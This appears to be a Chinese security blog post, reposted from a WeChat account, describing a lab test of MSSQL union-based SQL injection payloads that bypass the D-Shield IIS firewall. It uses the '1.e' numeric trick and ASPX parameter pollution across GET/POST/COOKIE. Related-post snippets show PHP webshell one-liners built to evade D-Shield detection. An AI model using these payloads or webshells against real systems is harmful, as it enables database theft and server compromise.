Bypass之D盾IIS防火墙SQL联合注入绕过(新版)

最新推荐文章于 2024-07-24 13:10:28 发布
最新推荐文章于 2024-07-24 13:10:28 发布
阅读量1.1w 收藏 15
点赞数
分类专栏: 渗透姿势收集 文章标签: D盾SQL注入联合查询绕过检测
这种技术文章,不好意思标原创了,一下内容均来自公众号
Bypass

实验环境
IIS+ASPX+MSSQL

一、MSSQL特性
在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:
1.空白字符
01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

2.注释符号

Mssql也可以使用注释符号/**/

3.浮点数

select * from admin where id=1.1union select 1,'2',db_name() from admin

4.1E0的形式:

select * from admin where id=1e0union select 1,'2',db_name() from admin

但是很遗憾,以上几种填充方式都无法绕过D盾的union select检测

二、bypass Fuzz
针对构造的SQL注入点,进行Fuzz参数和union之间的位置

http://192.168.8.161/sql.aspx?id=1【Fuzz位置】union select null,null,SYSTEM_USER

Fuzz结果:通过1.e这种特殊的数值形式,可成功绕过union select防御。

1803112887.png

到这里,可union select,形成了部分Bypass,接下来考虑,如何去绕过select from的防御规则。

三、个人觉得比较厉害的 ASPX HPP特性绕过
假设GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序是什么样呢?

ASPX+IIS:同时提交参数id,会接收所有参数,通过逗号分隔,如下图:

二、Bypass 测试

    利用ASPX+IIS同时接收参数的方式比较特别,可以用这个特性来搞事。 利用这个特性来拆分select from,从而绕过D盾的SQL注入防御规则。


总之就是用  1.e  来绕过D盾对union select的检测
用ASPX的特性,将要输入的payload语句放在   GET,POST,COOKIE的位置传输,来绕过D盾对select from语句的检测
白帽梦想家
关注
专栏目录
sql注入绕过
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-16 886
【代码】sql注入绕过
bypass新版d盾mysql_Bypass 护卫神SQL注入防御(多姿势)
weixin_29543939的博客
02-06 909
0x00 前言​ 护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL注入功能。这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。0x01 环境搭建软件版本:护卫神·入侵防护系统 V3.8.1 最新版本测试环境:IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL0x02 WAF测...
sqlmap绕过d盾_姿势分享——SQL注入bypass D盾
weixin_39594080的博客
12-09 5591
首先感谢兄弟们的支持与关注,我们的成长离不开您的陪伴在我们做项目的途中经常会遇到各种各样的waf,防火墙等来拦截我们的payload,这很是让渗透测试人员头疼,其实网上就有很多关于waf绕过原理的文章,这篇文章就是想告诉大家,当大家理解了网上关于waf绕过的文章的内容并对其原理了解后,其实把理论深化进实践中并没有多困难,本篇文章就是将一个简单常规的小思路实践了一下,便成功绕过D盾的wa...
绕过D盾D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
Web渗透-WAF绕过技巧
最新发布
Varin
07-24 1143
Web应用防火墙(WAF)绕过是指黑客采用特定技术或策略,规避WAF的检测和防御机制,以对后端Web应用实施攻击。常见手法包括使用编码技巧(如URL编码、Base64编码)改变攻击载荷的呈现形式;利用WAF未过滤的HTTP方法或不常见的字符集;以及通过慢速攻击、分布式请求等方式避免触发阈值规则。攻击者还可能分析WAF的响应模式,通过微调输入来躲避特征匹配。WAF绕过的成功实施可使恶意活动直接威胁到网站的安全性与稳定性。
bypass新版d盾mysql_21. Bypass D盾_防火墙(旧版 and 新版SQL注入防御(多姿势)...
weixin_31437187的博客
02-03 286
D盾旧版:00前言D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思路:a、白名单...
Bypass D盾_IIS防火墙SQL注入防御(多姿势)
09-14 1450

 0X01 前言
   D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL...
注入mysql win2003服务器密码_Win2003服务器防SQL注入神器--D盾_IIS防火墙
weixin_36464343的博客
01-19 169
0X01 前言D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思路:a、白名单 ...
第06篇:Bypass D盾_IIS防火墙SQL注入防御(多姿势)1
08-03
思路:a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql,可花费不少时间,测试过
第一篇:Bypass D盾_IIS防火墙SQL注入防御(多姿势)1
08-03
这边的策略,主要的测试思路:a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql
第三篇:Bypass ngx_lua_waf SQL注入防御(多姿势)1
08-03
### Bypass ngx_lua_waf SQL注入防御方法解析 #### 0x00 前言 ngx_lua_waf是一款基于ngx_lua的Web应用防火墙,以其高性能和轻量级著称。它内置了一系列针对常见攻击手段(如SQL注入)的防御规则。然而,任何安全...
Bypass D盾_防火墙新版SQL注入防御.pdf
12-21
Bypass D盾_防火墙新版SQL注入防御.pdf
从对网站进行SQL注入到下载网站整站源码的全过程.zip
12-11
4. **Bypass Sql防护措施**:文件“3 Bypass Sql”可能涉及绕过数据库安全防护的技巧。这可能包括使用盲注、时间延迟注入或利用数据库的特定功能来规避安全措施。 5. **获取数据库权限**:一旦找到注入点并能执行...
Sql server注入注入绕过
qq_42990434的博客
12-17 4100
本章目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾 绕过特性 前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过1.e这样的形式,可以用它绕过D盾SQL注入防护,通过简单的Fuzz,我们来一起探索一下M
sqlmap绕过d盾_记一次很迷的绕过D盾的经历
weixin_39949473的博客
12-09 2512
今天上课的时候,无聊的我看着qq中的群聊,突然看到一个学弟说有个存在D盾的站绕不过去,我心想到我展现自己的时候了,互加好友之后,也拿到了站点。一个单引号打过去给我拦截了。被拦截了,也要想办法毕竟不能丢脸,尝试了很多办法都没有绕过。睡着还被老师发现,让我站起来回答问题,啊这,我灵机一动说我趴着听课呢?逃过一劫,但做人不能放弃啊,我下课直接去吃饭了,已经放弃的我打算写作业,然后又想起来那个站...
简单绕过d 盾 (免杀马)
wsitcj的博客
03-29 602
用代码执行的思路绕过,设置一个类,把他绕晕(手动滑稽) <?php Class hello{ public function pingjie(){ $a="ass"; $b="ert"; return $a.$b; } public function __construct($str){ $this->name = $str; } public function __destruct(){ $t=$this->pingjie(); $t($this
绕过D盾的一句话
03-05 5734
一个很简单的一个技巧,作个笔记,可以绕过D盾检测。 新建test1.php &lt;?php eval($_POST[g]); ?&gt; 新建test2.php &lt;?php $a="$_POST[g]"; eval($a=$a); ?&gt; 使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。 那么问题就出现...
绕过D盾的php一句话
weixin_30847271的博客
04-23 986
d_dun.php <?php $a = '小狗狗你好啊'; $b = '小盾盾你好啊'; foreach ($_REQUEST as $key => $value) { $$key = $value; } 注入页插入: <?php include 'd_dun.php'; $b( $a ); 注入页调用: ?b=ass...
深入探究SQL注入:类型、防护与绕过策略
通过实例分析,学员可以掌握如何构造SQL注入语句并利用它来绕过服务器和应用程序的安全防护,例如Web应用防火墙(WAF)。 课程内容详细介绍了SQL注入的定义,它是如何通过恶意构造SQL代码来操纵应用程序的输入参数...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值